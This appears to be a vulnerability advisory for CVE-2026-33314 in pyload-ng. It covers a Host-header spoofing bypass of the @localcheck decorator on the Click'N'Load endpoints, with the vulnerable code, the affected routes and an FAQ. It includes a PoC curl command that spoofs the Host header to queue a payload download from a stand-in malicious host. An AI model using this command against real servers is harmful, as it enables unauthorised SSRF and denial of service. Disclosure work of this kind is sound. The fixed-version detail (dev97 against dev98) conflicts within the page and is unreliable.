CVE-2026-33314: pyload-ng: Improper Authentication and Origin Validation Error
Summary
A Host Header Spoofing vulnerability in the @localcheck decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS).
Details
The pyload WebUI provides an API for the Click'N'Load plugin, which is intended to be accessed only from the local machine (e.g., via a browser extension sending requests to localhost:9666). To enforce this, the pyload application uses a @localcheck decorator on the relevant routes in src/pyload/webui/app/blueprints/cnlblueprint.py.
However, the @localcheck implementation relies on the user-controlled HTTPHOST (derived from the HTTP Host header) to verify the origin:
python src/pyload/webui/app/blueprints/cnlblueprint.py def localcheck(func): @wraps(func) def wrapper(args, kwargs): remoteaddr = flask.request.environ.get("REMOTEADDR", "0") httphost = flask.request.environ.get("HTTPHOST", "0")
if remoteaddr in ("127.0.0.1", "::ffff:127.0.0.1", "::1", "localhost") or httphost in ( "127.0.0.1:9666", "[::1]:9666", ): return func(args, kwargs) else: return "Forbidden", 403 return wrapper
Because httphost is read directly from the Host header of the HTTP request, an external attacker can easily spoof this header (e.g., Host: 127.0.0.1:9666). When this spoofed header is present, the condition httphost in ("127.0.0.1:9666", ...) evaluates to True, completely bypassing the IP address check (remoteaddr) and granting access to the protected functions.
The affected routes are:
- /flash/ and /flash/<id> - /flash/add - /flash/addcrypted - /flash/addcrypted2 - /flashgot and /flashgotpyload - /flash/checkSupportForUrl
PoC
1. Ensure the PyLoad instance is running and accessible externally. 2. Ensure the ClickNLoad plugin is enabled in the PyLoad settings (it evaluates to disabled by default). 3. Send a POST request to one of the protected endpoints, such as /flash/add, and spoof the Host header to 127.0.0.1:9666.
Example curl command:
bash curl -i -X POST "http://<pyload-external-ip>:<port>/flash/add" \ -H "Host: 127.0.0.1:9666" \ -d "urls=http://malicious.com/payload.bin" \ -d "package=MaliciousPackage"
4. Notice that you receive a success\r\n response instead of a 403 Forbidden. The package and URL will be successfully added to the PyLoad queue.
Impact
This vulnerability allows unauthenticated attackers to interact with the Click'N'Load API. Attackers can arbitrarily add URLs to the download queue, which forces the PyLoad server to make outbound requests to attacker-controlled or internal URLs (SSRF). Attackers can also exhaust the server's storage or bandwidth by queueing massive files (DoS).
Other sources
pyLoad is a free and open-source download manager written in Python. Prior to version 0.5.0b3.dev97, a Host Header Spoofing vulnerability in the @localcheck decorator allows unauthenticated external attackers to bypass local-only restrictions. This grants access to the Click'N'Load API endpoints, enabling attackers to remotely queue arbitrary downloads, leading to Server-Side Request Forgery (SSRF) and Denial of Service (DoS). This issue has been patched in version 0.5.0b3.dev97.
— MITRE
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2026-33314?
CVE-2026-33314 is a critical vulnerability that allows unauthenticated attackers to bypass local-only restrictions.
How do I fix CVE-2026-33314?
To fix CVE-2026-33314, update to pyload-ng version 0.5.0b3.dev98 or later.
What kind of attacks can be executed through CVE-2026-33314?
CVE-2026-33314 enables attackers to access the Click'N'Load API, potentially allowing them to queue arbitrary downloads.
What systems are affected by CVE-2026-33314?
CVE-2026-33314 affects pyload-ng versions up to and including 0.5.0b3.dev96.
Is authentication required for exploiting CVE-2026-33314?
No, CVE-2026-33314 can be exploited by unauthenticated external attackers.